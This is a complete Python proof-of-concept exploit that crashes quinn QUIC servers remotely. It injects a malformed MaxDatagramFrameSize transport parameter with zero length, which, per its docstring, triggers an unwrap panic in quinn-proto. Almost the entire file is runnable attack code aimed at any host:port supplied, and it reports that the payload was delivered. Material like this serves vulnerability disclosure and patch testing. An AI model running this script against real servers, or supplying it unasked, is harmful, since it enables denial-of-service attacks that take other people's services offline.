#!/usr/bin/env python3
"""
PoC: crash a quinn server via malformed QUIC transport parameters.

quinn-proto/src/transport_parameters.rs:473 has .unwrap() on a fallible
VarInt decode. Sending MaxDatagramFrameSize (0x20) with length 0 causes
VarInt::decode to return Err(UnexpectedEnd), and the unwrap panics.

A single crafted UDP packet crashes any quinn server (remote DoS).

Usage:
    # Terminal 1: start the example server
    cargo run --example server -- ./

    # Terminal 2: send the malicious packet
    python3 attack.py [::1]:4433
"""

from __future__ import annotations

import argparse
import socket
import sys
import time
from typing import Tuple

from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import QuicConnection

DEFAULT_TARGET = "[::1]:4433"
DEFAULT_TIMEOUT = 0.35
DEFAULT_ROUNDS = 8


def parse_target(value: str) -> Tuple[str, int]:
    # Handle [::1]:port style
    if value.startswith("["):
        bracket_end = value.index("]")
        host = value[1:bracket_end]
        port = int(value[bracket_end + 2 :])
    else:
        host, _, port_str = value.rpartition(":")
        if not host:
            raise ValueError(f"invalid target '{value}', expected host:port")
        port = int(port_str)
    if port < 1 or port > 65535:
        raise ValueError(f"port out of range")
    return host, port


def build_malformed_connection(target_addr):
    cfg = QuicConfiguration(is_client=True, alpn_protocols=["hq-29"])
    conn = QuicConnection(configuration=cfg)
    # Inject malformed transport parameters:
    # 0x20 = MaxDatagramFrameSize param ID, 0x00 = length 0 (no value bytes)
    # quinn does r.get::<VarInt>().unwrap() on an empty buffer → panic
    conn._serialize_transport_parameters = lambda: b"\x20\x00"
    conn.connect(target_addr, now=time.time())
    return conn


def exploit_once(host: str, port: int, timeout_s: float, rounds: int):
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_DGRAM)
    family, _socktype, _proto, _canonname, sockaddr = infos[0]

    conn = build_malformed_connection(sockaddr)
    sent_packets = 0
    sent_bytes = 0
    recv_packets = 0

    with socket.socket(family, socket.SOCK_DGRAM) as sock:
        bind_addr = ("::", 0, 0, 0) if family == socket.AF_INET6 else ("0.0.0.0", 0)
        sock.bind(bind_addr)

        for _ in range(rounds):
            outgoing = conn.datagrams_to_send(now=time.time())
            if not outgoing:
                break

            for data, addr in outgoing:
                sock.sendto(data, addr)
                sent_packets += 1
                sent_bytes += len(data)

            deadline = time.time() + timeout_s
            while True:
                remaining = deadline - time.time()
                if remaining <= 0:
                    break
                sock.settimeout(remaining)
                try:
                    data, addr = sock.recvfrom(8192)
                except socket.timeout:
                    break
                recv_packets += 1
                conn.receive_datagram(data, addr, now=time.time())

    return sent_packets, sent_bytes, recv_packets


def main() -> int:
    parser = argparse.ArgumentParser(
        description="PoC: crash a quinn server via malformed transport parameters"
    )
    parser.add_argument("target", nargs="?", default=DEFAULT_TARGET)
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    parser.add_argument("--rounds", type=int, default=DEFAULT_ROUNDS)
    args = parser.parse_args()

    try:
        host, port = parse_target(args.target)
    except Exception as exc:
        print(f"error: {exc}", file=sys.stderr)
        return 2

    print(f"target={host}:{port} timeout={args.timeout}s rounds={args.rounds}")

    try:
        sent_packets, sent_bytes, recv_packets = exploit_once(
            host, port, args.timeout, args.rounds
        )
    except Exception as exc:
        print(f"error: {exc}", file=sys.stderr)
        return 1

    print(f"sent_packets={sent_packets}, sent_bytes={sent_bytes}, recv_packets={recv_packets}")
    if sent_packets > 0:
        print("payload delivered — server should have panicked")
        return 0

    print("error: no packets sent", file=sys.stderr)
    return 1


if __name__ == "__main__":
    raise SystemExit(main())
